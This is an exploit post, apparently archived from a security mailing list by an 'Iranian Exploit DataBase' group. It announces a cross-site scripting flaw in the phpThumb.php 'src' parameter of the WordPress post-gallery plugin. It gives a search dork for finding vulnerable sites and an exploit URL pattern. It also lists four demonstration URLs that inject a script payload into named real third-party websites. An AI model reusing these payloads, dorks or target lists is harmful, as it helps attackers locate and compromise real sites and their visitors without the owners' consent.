[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Wordpress post-gallery Plugin Xss vulnerabilities



The Wordpress post-gallery Plugin suffers from a Cross-Site Scripting vulnerability.

#################################

#          Iranian Exploit DataBase Forum

#               http://iedb.ir/acc

#                 http://iedb.ir

#################################

# Exploit Title : Wordpress post-gallery Plugin Xss vulnerabilities

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : IeDb.Team@xxxxxxxxx

# Home : http://iedb.ir   -   http://iedb.ir/acc

# Software Link : http://wordpress.org/

# Security Risk : High

# Tested on : Linux

# Dork : inurl:/post-gallery/thirdparty/phpthumb/

#################################

# Exploit :

# http://site.com/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=[Xss]

# Dem0 :

http://www.knappenforeningen.no/wp/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=";><script>alert(/IeDb.Ir/)</script>
http://monsterbike.eu/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=";><script>alert(/IeDb.Ir/)</script>
http://www.yerevanmagazine.com/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=";><script>alert(/IeDb.Ir/)</script>
http://www.bambusudsalg.dk/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=";><script>alert(/IeDb.Ir/)</script>

#################################

# Tnx To : TaK.FaNaR - l4tr0d3ctism - r3d_s0urc3 - Bl4ck M4n - F&#945;&#1103;iD - Medrik - Achraf - Dj.TiniVini

# B3hz4d - C0dex - Beni_Vanda  & All Member In Iedb.ir/acc & Iranian Hackers

#################################

# Exploit Archive = http://www.iedb.ir/exploits-411.html

#################################